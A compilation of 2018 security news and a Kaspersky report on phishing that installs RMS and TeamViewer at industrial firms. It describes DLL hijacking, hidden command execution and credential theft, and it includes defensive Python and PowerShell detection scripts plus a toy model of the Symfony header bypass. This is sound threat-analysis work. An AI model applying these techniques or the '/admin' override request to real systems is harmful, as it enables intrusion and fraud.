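Because the injection happens in the router's error page, the same check can be pointed at responses that should never contain script at all (404 and 5xx pages from an ISP-side device), where any miner loader is a finding on its own.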


Global Shipping Firm Clarksons Provides Update on 2017 Breach
3.8.2018 securityweek Incident

Clarkson PLC (Clarksons), a global shipping services firm, this week provided an update to the breach it suffered between May and November 2017. Little further on the nature of the breach is revealed, other than the extent of the customer personal information that was stolen.

In November 2017, Clarksons revealed that a single compromised user account had allowed attackers to infiltrate their systems, exfiltrate personal data, and demand a ransom for its safe return. Clarksons declined to pay the ransom, and for some time it was expected that the data might be revealed. "I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised," said Andi Case, CEO of Clarksons.

In its latest statement (PDF) the firm claims it was able -- with the help of law enforcement and forensic specialists -- to successfully trace and recover the stolen data. It doesn't state -- and probably could not know -- whether the stolen data had been copied before it was recovered. It is nevertheless warning those potentially affected by the incident to, "Remain vigilant against incidents of identity theft and fraud by reviewing personal account statements for suspicious activity and to detect errors."

What is most surprising in this updated information is the extent of personal information that was stored by the company and stolen by the criminals. In full, the statement says,

"While the potentially affected personal information varies by individual, this data may include a date of birth, contact information, criminal conviction information, ethnicity, medical information, religion, login information, signature, tax information, insurance information, informal reference, national insurance number, passport information, social security number, visa/travel information, CV / resume, driver's license/vehicle identification information, seafarer information, bank account information, payment card information, financial information, address information and/or information concerning minors."

There is no mention of whether any of this data was encrypted or hashed. Identity theft, bank fraud and blackmail are the most obvious threats if such data were in the wrong hands.

"In this particular incident, what is honestly shocking is the amount of sensitive data that this single account had access to and I am sure the EU GDPR will be looking closely," comments Joseph Carson, chief security scientist at Thycotic. "If it is found that EU GDPR applies, and Clarkson PLC had failed to apply adequate security, they could be facing a huge financial penalty." Whether GDPR can be invoked will be up to the individual EU regulators. Clarksons claims the intruder had access to its systems from May 31, 2017 until November 4, 2017, which is before GDPR became active on May 25, 2018.

Rishi Bhargava, co-founder at Demisto, told SecurityWeek that Clarksons appears to have gone through the mechanics of breach notification conscientiously. "Clarksons seems to have provided updates and apprised affected individuals in a comprehensive and transparent manner," he said. "There are numerous cross-industry regulations to deal with while implementing breach notifications, and the granularity of US state-specific information shared by Clarksons is testament to that."

But he added, "The bigger question to consider is whether Clarksons needed to retain all this personal information in the first place. With GDPR introducing strict regulations for data processing, data consent, explicit need for processing, retention timelines, and deletion, organizations need to rethink their entire ‘data supply chain' if they haven't already. However transparent breach notifications are, they're still a post-breach exercise and need to be matched by operational data discipline in order to truly bring accountability to data processors."

It is possible that the tracing and recovery of the stolen data also implies knowledge of the perpetrator -- he or she may even be in custody. If this is true, it will probably be only through subsequent court documents that we discover exactly how the breach occurred. However, most security experts believe our knowledge so far points to a failure to use multi-factor authentication, and a failure to adequately manage privileged accounts.

Timur Kovalev, CTO at Untangle, told SecurityWeek, "While unfortunate, these sorts of breaches are certainly not uncommon. However, there are steps that organizations can take to mitigate their risk. Requiring multi-factor authentication for user accounts is a rational first step. Additionally, IT departments need to limit access of even properly credentialed users to only those apps and systems that are critical for that person's business use. Finally, companies can reduce the amount of customer data they are storing anywhere on networked systems; GDPR will certainly help accelerate this best practice."

Carson agrees. "The lesson to be learned from this incident is the importance in protecting accounts with privileged access to sensitive data and that those accounts should never use a password as the only security control. Similarly, a single account should never have full access to such a large amount of data -- at least without peer reviews and approval processes."

The question of whether Clarksons had a valid reason to store that amount of highly sensitive personal data remains one for the regulators.


Google Offers G Suite Alerts for State-Sponsored Attacks
3.8.2018 securityweek  Attack

Google this week announced that it can now alert G Suite admins when it believes users have been targeted by government-backed attackers.

The search company has been notifying users on what it believes might be state-sponsored attacks for over six years, and reaffirmed its commitment to continue alerting users on such incidents last year.

The Internet giant is now providing G Suite admins with the option to receive alerts whenever attacks appearing to be coming from a state-sponsored actor are targeting their users. The feature will show up in the G Suite Admin console as soon as it becomes available.

“If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method,” Google explains.

As usual, such alerts don’t necessarily imply that the account has been compromised or that the organization has been hit with a larger attack.

The new feature is turned off by default, but admins can easily enable or disable it in Admin Console > Reports > Manage Alerts > Government backed attack.

The feature also allows admins to set who is being notified when such attacks are detected (by default, super admins receive the notification via email).

Once an attack has been detected, admins can choose to secure the account suspected to have been targeted, and can also opt to alert the user on both the attack and the security measures taken.

The feature is set to gradually roll out to all G Suite editions and should be available for all admins within the next 15 days, Google said.

Companies such as Microsoft, Facebook, and Twitter are also warning users when detecting attacks believed to have been performed by a government-backed actor.


Industrial Sector targeted in surgical spear-phishing attacks
3.8.2018 securityaffairs Phishing

Industrial sector hit by a surgical spear-phishing campaign aimed at installing legitimate remote administration software on victims’ machines.
Attackers carried out a spear-phishing campaign against entities in the industrial sector; the messages, disguised as commercial offers, were used to deliver legitimate remote administration software (TeamViewer or Remote Manipulator System/Remote Utilities (RMS)) onto victims’ systems.

Attackers personalized the content of each phishing email reflecting the activity of the target organization and the type of work performed by the employee to whom the email is sent.

The campaign was discovered by experts from Kaspersky Lab who speculate the attackers are financially motivated.

“Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.” reads the blog post published by Kaspersky.

“According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts,”

Once the attackers have gained access to the victim’s system they will search for any purchase documents, as well as the financial and accounting software. Then the crooks look for various ways in which they can monetize their effort, for example, by spoofing the bank details used to make payments.

According to Kaspersky, there was a spike in the number of spear phishing messages in November 2017 that targeted up to 400 industrial companies located in Russia.


The spear-phishing campaign is still ongoing, the messages purported to be invitations to tender from large industrial companies.

The quality of the phishing messages suggests the attackers have spent a significant effort in the reconnaissance phase.

“It is worth noting that the attackers addressed an employee of the company under attack by his or her full name,” state the researchers. “This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.”

The attackers used both malicious attachments and links to external resources that are used to download the malicious code.

“Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter,” state the researchers.

“For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.”

For both legitimate tools used by the attackers, TeamViewer and Remote Manipulator System/Remote Utilities (RMS), the attackers performed a DLL hijacking attack: malicious code runs inside the process because a malicious library is substituted for a system DLL that the program loads.

The malicious library impersonates winspool.drv, a system file located in the system folder that is used to send documents to the printer.

The malicious winspool.drv decrypts the attackers’ configuration files, including software settings and the password for remotely controlling the target machine.

In the case of RMS, one of the configuration files includes the email address used by the attacker to receive the information (i.e. computer name, username and the RMS machine’s internet ID) about the infected system.

When the attackers use TeamViewer software to exfiltrate system information, a file in a malicious library contains various parameters, including the password used for remotely controlling the system and a URL of the attackers’ command-and-control server.

Unlike RMS, TeamViewer also uses a built-in VPN to remotely control a computer located behind NAT.

“After launching, the malicious library checks whether an internet connection is available by executing the command “ping 1.1.1.1” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.” continues the analysis.

“Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.”

Kaspersky highlighted that the industrial sector is becoming a privileged target for crooks, who are able to make profits even using simple techniques and known malware.

The use of legitimate remote administration software allows crooks to gain full control of compromised systems while avoiding detection.

“This choice on the part of the cybercriminals could be explained by the fact that the threat-awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies),” Kaspersky concludes.


CVE-2018-14773 Symfony flaw exposes Drupal websites to hack
3.8.2018 securityaffairs Vulnerability

A vulnerability in the Symfony HttpFoundation component, tracked as CVE-2018-14773, could be exploited by attackers to take full control of affected Drupal websites.
Maintainers at Drupal addressed the security bypass vulnerability by releasing a new version of the popular content management system, version 8.5.6.

“The Drupal project uses the Symfony library. The Symfony library has released a security update that impacts Drupal. Refer to the Symfony security advisory for the issue. The same vulnerability also exists in the Zend Feed and Diactoros libraries included in Drupal core; however, Drupal core does not use the vulnerable functionality.” reads the advisory published by Drupal.

“If your site or module uses Zend Feed or Diactoros directly, read the Zend Framework security advisory and update or patch as needed.”

The Symfony HttpFoundation component is a third-party library used in Drupal core; the flaw affects Drupal 8.x versions before 8.5.6.

Symfony is a web application framework used by a large number of projects, which means the CVE-2018-14773 vulnerability could potentially affect many web applications beyond Drupal.

The flaw is due to Symfony’s support for legacy and risky HTTP headers.

“Support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header allows a user to access one URL but have Symfony return a different one which can bypass restrictions on higher level caches and web servers.” reads the security advisory published by Symfony.

“The fix drops support for these two obsolete IIS headers: X-Original-URL and X_REWRITE_URL.” reads the security advisory published by Symfony.

A remote attacker can trigger the flaw by sending a specially crafted ‘X-Original-URL’ or ‘X-Rewrite-URL’ HTTP header value.

According to the security advisory published by Symfony, versions 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3 address the flaw.
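The bypass described in the advisory is a mismatch between two views of one request: the web server or cache in front of the application enforces its restrictions on the request line, while the framework, honouring the legacy header, routes on a different path. The following is an added toy model of that behaviour, not Symfony's or Drupal's code: the two header names come from the advisory, while the front-end deny rule, the resolver functions and the sample request are constructed for illustration. It shows the pre-fix and post-fix resolvers side by side and includes a small helper for spotting these headers in request logs.

```python
# Toy model of the behaviour fixed for CVE-2018-14773 (added example, not
# Symfony's code). Header names are from the advisory; the front-end rule and
# resolver signatures are a constructed simplification of a real deployment.

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def _header(headers: dict, name: str):
    """Case-insensitive lookup of one request header."""
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def front_end_allows(request_path: str) -> bool:
    """Constructed edge rule: a web server or cache in front of the application
    denies /admin for everyone. It only ever sees the real request line."""
    return not request_path.startswith("/admin")


def path_info_vulnerable(request_path: str, headers: dict) -> str:
    """Pre-fix behaviour: a legacy IIS override header replaces the routed path,
    so the framework routes on a URL the front end never evaluated."""
    for name in OVERRIDE_HEADERS:
        override = _header(headers, name)
        if override:
            return override
    return request_path


def path_info_fixed(request_path: str, headers: dict) -> str:
    """Post-fix behaviour: the two obsolete headers are ignored entirely."""
    return request_path


def handle(request_path: str, headers: dict, resolver) -> tuple:
    """Two-tier request handling: edge check first, then the framework's view
    of the path. Returns (status, path the application would route on)."""
    if not front_end_allows(request_path):
        return (403, request_path)
    return (200, resolver(request_path, headers))


def override_attempted(headers: dict) -> bool:
    """Log-review helper: once the fix drops these headers nothing legitimate
    needs them, so their presence in client requests is worth logging or
    stripping at the edge while unpatched instances remain."""
    return any(_header(headers, name) is not None for name in OVERRIDE_HEADERS)


if __name__ == "__main__":
    request = {"Host": "drupal.example.test", "X-Original-URL": "/admin"}
    print("vulnerable:", handle("/", request, path_info_vulnerable))
    print("fixed:     ", handle("/", request, path_info_fixed))
```

The same mismatch is why the advisory talks about "higher level caches": a cache keyed on the request line would also store and serve the wrong response under the vulnerable resolver.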


The Drupal maintainers also found a similar issue affecting the Zend Feed and Diactoros libraries used in Drupal core. The libraries are affected by a ‘URL Rewrite vulnerability’; however, the Drupal team confirmed that Drupal core does not use the vulnerable functionality.

Administrators of websites that use Zend Feed or Diactoros directly need to patch them as soon as possible.

Drupal administrators need to patch their installations urgently, before attackers start exploiting the CVE-2018-14773 flaw.


Google introduced G Suite alerts for state-sponsored attacks
3.8.2018 securityaffairs  Attack

Google announced that it has implemented an alerting system that notifies G Suite admins when users have been targeted by state-sponsored attacks.
Google will alert G Suite admins when state-sponsored hackers target their users.

The new feature will be available in the G Suite Admin console very soon; it confirms the effort the tech giant is spending on protecting its users.

“We’re adding a feature in the Admin console that can alert admins if we believe a user’s account has been targeted by a government-backed attack. If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method.” reads the security advisory published by Google.

“It does not necessarily mean that the account has been compromised or that there was a widespread attack on an organization.”

In June 2012, for the first time, the company announced it was going to offer a specific protection service for a restricted number of users who could be the target of state-sponsored attacks.

Google is now implementing the new protection feature within the G Suite Admin console; admins will have the opportunity to receive alerts whenever attacks could be attributed to a nation-state actor.

Every time an attack is detected, admins can choose to secure the account hit by the hackers and can also opt to alert the victim.

The alerts don’t necessarily imply that the account has been hacked or that the organization has been compromised in a massive attack.


Google pointed out that the alerts will be turned off by default; admins can choose to turn them on in the Admin Console > Reports > Manage Alerts > Government backed attack.

According to Google, the new feature is set to gradually roll out to all G Suite editions; the tech giant plans to make it available for all admins within the next 15 days.


Attacks on industrial enterprises using RMS and TeamViewer
3.8.2018 Kaspersky Attack

Main facts
Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.

The phishing emails are disguised as legitimate commercial offers and are sent mainly to industrial companies located in Russia. The content of each email reflects the activity of the organization under attack and the type of work performed by the employee to whom the email is sent.

According to the data that we have collected, this series of attacks started in November 2017 and is currently in progress. Notably, the first similar attacks were recorded as far back as 2015.

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS). This enables the attackers to gain remote control of infected systems. The threat actor uses various techniques to mask the infection and the activity of malware installed in the system.

According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts. When attackers connect to a victim’s computer, they search for and analyze purchase documents, as well as the financial and accounting software used. After that, the attackers look for various ways in which they can commit financial fraud, such as spoofing the bank details used to make payments.

In cases where the cybercriminals need additional data or capabilities after infecting a system, such as privilege escalation and obtaining local administrator privileges, the theft of user authentication data for financial software and services, or Windows accounts for lateral movement, the attackers download an additional pack of malware to the system, which is specifically tailored to the attack on each individual victim. The malware pack can include spyware, additional remote administration utilities that extend the attackers’ control on infected systems, malware for exploiting operating system and application software vulnerabilities, as well as the Mimikatz utility, which provides the attackers with Windows account data.

Apparently, among other methods, the attackers obtain the information they need to perpetrate their criminal activity by analyzing the correspondence of employees at the enterprises attacked. They may also use the information found in these emails to prepare new attacks – against companies that partner with the current victim.

Clearly, on top of the financial losses, these attacks result in leaks of the victim organizations’ sensitive data.

Phishing emails
In most cases, the phishing emails have finance-related content; the names of attachments also point to their connection with finance. Specifically, some of the emails purport to be invitations to tender from large industrial companies (see below).

Malicious attachments may be packed into archives. Some of the emails have no attachments – in these cases, message text is designed to lure users into following links leading to external resources and downloading malicious objects from those resources.

Below is a sample phishing email used in attacks on some organizations:

Screenshot of a phishing email

The above email was sent on behalf of a well-known industrial organization. The domain name of the server from which the message was sent was similar to the domain name of that organization’s official website. The email had an archive attached to it. The archive was protected with a password that could be found in the message body.

It is worth noting that the attackers addressed an employee of the company under attack by his or her full name (this part of the email was masked in the screenshot above for confidentiality reasons). This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.

As part of the attacks, the threat actor uses various techniques to mask the infection. In this case, Seldon 1.7 – legitimate software designed to search for tenders – is installed in infected systems in addition to malware components and a remote administration application.

To keep users from wondering why they didn’t get information on the procurement tender referred to in the phishing email, the malicious program distributes a damaged copy of Seldon 1.7 software.

Window of legitimate software Seldon 1.7

In other cases, the user is shown a partially damaged image.

Image opened by malware

There is also a known case of malware being masked as a PDF document containing a bank transfer receipt. Curiously, the receipt contains valid data. Specifically, it mentions existing companies and their valid financial details; even a car’s VIN matches its model.

Screenshot of a bank transfer receipt displayed by malware

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS).

Attacks using RMS
There are several known ways in which the malware can be installed in a system. Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.

For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.

Contents of the malware installation file

It can be seen from the commands in the screenshot above that after copying the files the script deletes its own file and launches legitimate software in the system (Seldon v.1.7 and RMS), enabling the attackers to control the infected system without the user’s knowledge.

Depending on the malware version, files are installed in the %AppData%\LocalDataNT, %AppData%\NTLocalData or %AppData%\NTLocalAppData folder.

When it launches, legitimate RMS software loads dynamic libraries (DLL) required for the program’s operation, including the system file winspool.drv, which is located in the system folder and is used to send documents to the printer. RMS loads the library insecurely, using its relative path (the vendor has been notified of this vulnerability). This enables the attackers to conduct a DLL hijacking attack: they place a malicious library in the same directory with the RMS executable file, as a result of which a malware component loads and gains control instead of the corresponding system library.

The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.

It is most likely that the attackers chose this approach to mask the presence of malware in the system as well as possible. The malicious library also implements techniques for resisting analysis and detection. One such technique involves dynamically importing Windows API functions using their hashes. This way, the attackers do not have to store the names of these functions in the malicious library’s body, which helps them to conceal the program’s real functionality from most analysis tools.

Part of a malicious code fragment implementing the dynamic import of functions

The malicious dynamic library, winspool.drv, decrypts configuration files prepared by the attackers, which contain RMS software settings, the password for remotely controlling the machine and the settings needed to notify the attackers that the system has been successfully infected.

One of the configuration files contains an email address to which information about the infected system is sent, including computer name, user name, the RMS machine’s Internet ID, etc. The Internet ID sent as part of this information is generated on a legitimate server of the RMS vendor after the computer connects to it. The identifier is subsequently used to connect to the remotely controlled system located behind NAT (a similar mechanism is also used in popular instant messaging solutions).

A list of email addresses found in the configuration files discovered is provided in the indicators of compromise section.

A modified version of RC4 is used to encrypt configuration files. Configuration files from the archive mentioned above are shown below.

Decrypted contents of InternetId.rcfg file

Decrypted contents of notification.rcfg file

Decrypted contents of Options.rcfg file

Decrypted contents of Password.rcfg file

After this, the attackers can use the system’s Internet ID and password to control it without the user’s knowledge via a legitimate RMS server, using the standard RMS client.

Attacks using TeamViewer
Attacks using legitimate TeamViewer software are very similar to those using RMS software, which are described above. A distinguishing feature is that information from infected systems is sent to malware command-and-control servers, rather than the attackers’ email address.

As in the case of RMS, malicious code is injected into the TeamViewer process by substituting a malicious library for a system DLL. In the case of TeamViewer, msimg32.dll is used.

This is not a unique tactic. Legitimate TeamViewer software has been used in APT and cybercriminal attacks before. The best-known group to have used this toolset is TeamSpy Crew. We believe that the attacks described in this document are not associated with TeamSpy and are the result of known malware being re-used by another cybercriminal group. Curiously, the algorithm used to encrypt the configuration file and the password for decrypting it, which were identified in the process of analyzing these attacks, are the same as those published last April in a description of similar attacks.

It is common knowledge that legitimate TeamViewer software does not hide its startup or operation from the user and, specifically, notifies the user of incoming connections. At the same time, the attackers need to gain remote control of the infected system without the user’s knowledge. To achieve this, they hook several Windows API functions.

The functions are hooked using a well-known method called splicing. As a result, when legitimate software calls one of the Windows API functions, control is passed to the malicious DLL and the legitimate software gets a spoofed response instead of one from the operating system.

Windows API function hooked by the malware

Hooking Windows API functions enables attackers to hide TeamViewer windows, protect malware files from being detected, and control TeamViewer startup parameters.

After launching, the malicious library checks whether an internet connection is available by executing the command “ping 1.1.1.1” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.

Screenshot of decrypted contents of the malware configuration file

Unlike RMS, TeamViewer uses a built-in VPN to remotely control a computer located behind NAT.

As in the case of RMS, the relevant value is added to the RunOnce registry key to ensure that the malware runs automatically at system startup.
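The RMS and TeamViewer sections above share two host-level artefacts that are easy to hunt for: a file named winspool.drv or msimg32.dll sitting outside the Windows directory next to the remote-administration executable (the DLL hijacking placement), and a RunOnce value that relaunches something from the %AppData% drop folders the report lists. The following is an added triage example, not Kaspersky's code or tooling, that applies both checks to a constructed host inventory; a real run would feed it a file listing and the exported RunOnce values from the host being examined. The file paths, the RunOnce values and the placeholder name rms_host.exe are constructed (the report does not name the RMS executable).

```python
import ntpath

# Indicators taken from the report text: the DLL names the malware substitutes
# for system libraries and the %AppData% drop folders it installs into.
SIDELOADED_DLLS = {"winspool.drv", "msimg32.dll"}
DROP_FOLDERS = {"localdatant", "ntlocaldata", "ntlocalappdata"}
WINDOWS_DIR = "c:\\windows\\"

# Constructed host inventory (not real forensic data): file paths seen on a
# workstation and the values under the user's RunOnce key. "rms_host.exe" is a
# placeholder name; the report does not name the RMS executable.
SAMPLE_FILES = [
    r"C:\Windows\System32\winspool.drv",
    r"C:\Windows\System32\msimg32.dll",
    r"C:\Program Files\TeamViewer\TeamViewer.exe",
    r"C:\Users\alice\AppData\Roaming\LocalDataNT\winspool.drv",
    r"C:\Users\alice\AppData\Roaming\LocalDataNT\rms_host.exe",
    r"C:\Users\alice\AppData\Roaming\NTLocalData\msimg32.dll",
    r"C:\Users\alice\AppData\Roaming\NTLocalData\TeamViewer.exe",
]
SAMPLE_RUNONCE = {
    "VendorUpdater": r"C:\Program Files\Vendor\updater.exe /quiet",
    "LocalDataNT": r"C:\Users\alice\AppData\Roaming\LocalDataNT\rms_host.exe",
}


def _in_drop_folder(path: str) -> bool:
    """True when any path component is one of the report's drop folders."""
    return any(part in DROP_FOLDERS for part in path.lower().split("\\"))


def sideloaded_dll_candidates(files: list) -> list:
    """Copies of the named system DLLs outside the Windows directory. A genuine
    winspool.drv or msimg32.dll has no business sitting next to user-land
    executables; that placement is what the relative-path load picks up."""
    return [
        path for path in files
        if ntpath.basename(path).lower() in SIDELOADED_DLLS
        and not path.lower().startswith(WINDOWS_DIR)
    ]


def colocated_executables(files: list, dll_path: str) -> list:
    """Executables in the same directory as a suspect DLL: the program that
    would load it, and the thing to pull for further analysis."""
    directory = ntpath.dirname(dll_path).lower()
    return [
        path for path in files
        if ntpath.dirname(path).lower() == directory and path.lower().endswith(".exe")
    ]


def suspicious_runonce(values: dict) -> dict:
    """RunOnce entries launching something from one of the drop folders. The
    report notes the malware re-creates this value after each boot, so a
    single snapshot is enough to catch it."""
    return {name: cmd for name, cmd in values.items() if _in_drop_folder(cmd)}


def triage(files: list, runonce: dict) -> dict:
    """Combine both checks into one report for the host."""
    dlls = sideloaded_dll_candidates(files)
    report = {
        "sideloaded_dlls": {dll: colocated_executables(files, dll) for dll in dlls},
        "runonce_persistence": suspicious_runonce(runonce),
    }
    report["verdict"] = "suspicious" if dlls or report["runonce_persistence"] else "clean"
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FILES, SAMPLE_RUNONCE).items():
        print(f"{key}: {value}")
```

The DLL check deliberately ignores the executable's own name, since the report notes that TeamViewer is installed under a configurable service name; the folder and the misplaced system DLL are the stable part of the pattern.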

The malware collects data on the infected machine and sends it to the command-and-control server along with the system’s identifier needed for remote administration. The data sent includes:

Operating system version
User name
Computer name
Information on the privilege level of the user on whose behalf the malware is running
Whether or not a microphone and a webcam are present in the system
Whether or not antivirus software or other security solutions are installed, as well as the UAC level
Information about security software installed in the system is obtained using the following WQL query:

root\SecurityCenter:SELECT * FROM AntiVirusProduct

The information collected is sent to the attackers’ server using the following POST request:

POST request used to send encrypted data to the command-and-control server

Another distinguishing feature of attacks that involve TeamViewer is the ability to send commands to an infected system and have them executed by the malware. Commands are sent from the command-and-control server using the chat built into the TeamViewer application. The chat window is also hidden by the malicious library, and the log files are deleted.

A command sent to an infected system is executed in the Windows command interpreter using the following instruction:

cmd.exe /c start /b

The parameter “/b” indicates that the command sent by the attackers for execution will be run without creating a new window.

The malware also has a mechanism for self-destructing if the appropriate command is received from the attackers’ server.

The use of additional malware
In cases where attackers need additional data (authorization data, etc.), they download spyware to victim computers in order to collect logins and passwords for mailboxes, websites, and SSH/FTP/Telnet clients, as well as to log keystrokes and take screenshots.

Additional software hosted on the attackers’ servers and downloaded to victims’ computers was found to include malware from the following families:

Babylon RAT
Betabot/Neurevt
AZORult stealer
Hallaj PRO Rat
In all probability, these Trojans were downloaded to compromised systems and used to collect information and steal data. In addition to remote administration, the capabilities of malware from these families include:

Logging keystrokes
Making screenshots
Collecting system information and information on installed programs and running processes
Downloading additional malicious files
Using the computer as a proxy server
Stealing passwords from popular programs and browsers
Stealing cryptocurrency wallets
Stealing Skype correspondence
Conducting DDoS attacks
Intercepting and spoofing user traffic
Sending any user files to the command-and-control server
In other cases observed, after an initial analysis of an infected system, the attackers downloaded an additional malware module to the victim’s computer – a self-extracting archive containing various malicious and legitimate programs, which were apparently individually selected for each specific system.

For example, if the malware had previously been executed on behalf of a user who did not have local administrator privileges, to evade the Windows User Account Control (UAC), the attackers used the DLL hijacking technique mentioned above, but this time on a Windows system file, %systemdir%\migwiz\migwiz.exe, and a library, cryptbase.dll.

Additionally, another remote administration utility, RemoteUtilities, which provides a more extensive feature set for controlling an infected machine than RMS or TeamViewer, was installed on some systems. Its capabilities include:

Remotely controlling the system (RDP)
Transferring files to and from the infected system
Controlling power on the infected system
Remotely managing the processes of running applications
Remote shell (command line)
Managing hardware
Capturing screenshots and screen videos
Recording sound and video from recording devices connected to the infected system
Remote management of the system registry
The attackers use a modified build of RemoteUtilities, which enables them to perform the above operations without the user’s knowledge.

In some cases, the Mimikatz utility was installed in addition to cryptbase.dll and RemoteUtilities. We believe that the attackers use Mimikatz in cases when the first system infected is not one that has software for working with financial data installed on it. In these cases, the Mimikatz utility is used to steal authentication data from the organization’s employees and gain remote access to other machines on the enterprise’s network. The use of this technique by the attackers poses a serious danger: if they succeed in obtaining the account credentials for the domain administrator’s account, this will give them control of all systems on the enterprise’s network.
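As an added defender-side example (not code from Kaspersky Lab or from the report), the following PowerShell script hunts a Windows host for the artifacts described in the TeamViewer section and the additional-malware section above: RunOnce persistence entries, a cryptbase.dll placed beside migwiz.exe, services whose binary is TeamViewer or RemoteUtilities, and cmd.exe processes spawned by those tools. The function names, the use of rutserv.exe as the RemoteUtilities host binary, and the parent-process heuristic are our assumptions, not facts from the report.

```powershell
# Added example, not the report's code. Assumes Windows with PowerShell 5.1 or later,
# run from an elevated prompt so that HKLM, all services and all processes are readable.

function Get-RunOnceEntries {
    # The report says the loader is registered under RunOnce. Installers use RunOnce
    # legitimately, so every value is listed for analyst review rather than flagged outright.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # provider metadata, not a registry value
            [pscustomobject]@{ Check = 'RunOnce'; Location = $key; Name = $prop.Name; Value = $prop.Value }
        }
    }
}

function Test-MigwizCryptbaseHijack {
    # The legitimate cryptbase.dll is loaded from System32. A copy next to migwiz.exe
    # matches the UAC-evasion DLL hijack described in the report.
    $candidate = Join-Path $env:SystemRoot 'System32\migwiz\cryptbase.dll'
    if (Test-Path $candidate) {
        $sig = Get-AuthenticodeSignature -FilePath $candidate
        [pscustomobject]@{ Check = 'DllHijack'; Location = $candidate; Name = 'cryptbase.dll'; Value = $sig.Status }
    }
}

function Get-RemoteAdminServices {
    # TeamViewer is installed under an attacker-chosen service name, so match on the
    # binary path rather than the service name. rutserv.exe (RemoteUtilities host) is an assumption.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match 'TeamViewer|rutserv|RemoteUtilities' } |
        ForEach-Object {
            [pscustomobject]@{ Check = 'Service'; Location = $_.PathName; Name = $_.Name; Value = $_.State }
        }
}

function Get-ShellsSpawnedByRemoteTools {
    # Commands received over the hidden chat are run as "cmd.exe /c start /b" by code living
    # inside the remote-administration process, so a cmd.exe whose parent is that process
    # is worth a look (heuristic; legitimate admins can also open shells this way).
    $procs = Get-CimInstance -ClassName Win32_Process
    $byId = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }
    foreach ($p in $procs) {
        if ($p.Name -ne 'cmd.exe') { continue }
        $parent = $byId[[int]$p.ParentProcessId]
        if ($null -eq $parent) { continue }
        if ($parent.Name -match '^(TeamViewer|rutserv|RemoteUtilities)') {
            [pscustomobject]@{ Check = 'ChildShell'; Location = $parent.Name; Name = $p.ProcessId; Value = $p.CommandLine }
        }
    }
}

# Run every check and present the findings in one table.
$findings = @(Get-RunOnceEntries) + @(Test-MigwizCryptbaseHijack) +
            @(Get-RemoteAdminServices) + @(Get-ShellsSpawnedByRemoteTools)
if ($findings.Count -eq 0) {
    Write-Output 'No artifacts matching this campaign were found on this host.'
} else {
    $findings | Format-Table -AutoSize
}
```

The RunOnce and service checks will also list legitimate entries on many hosts; the value of the script is in reviewing them together with the migwiz and child-shell findings, which have few benign explanations.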

Attack targets
According to KSN data, from October 2017 to June 2018, about 800 computers of employees working at industrial companies were attacked using the malware described in this paper.

Number of computers attacked by month. October 2017 – June 2018

According to our estimate, at least 400 industrial companies in Russia have been targeted by this attack, including companies in the following industries:

Manufacturing
Oil and gas
Metallurgy
Engineering
Energy
Construction
Mining
Logistics
Based on this, it can be concluded that the attackers do not concentrate on companies in any specific industry or sector. At the same time, their activity clearly demonstrates their determination to compromise specifically systems belonging to industrial companies. This choice on the part of the cybercriminals could be explained by the fact that the threat awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies). At the same time, as we have noted before, it is more common for industrial companies than for companies in other sectors to conduct operations involving large amounts of money on their accounts. This makes them an even more attractive target for cybercriminals.

Conclusions
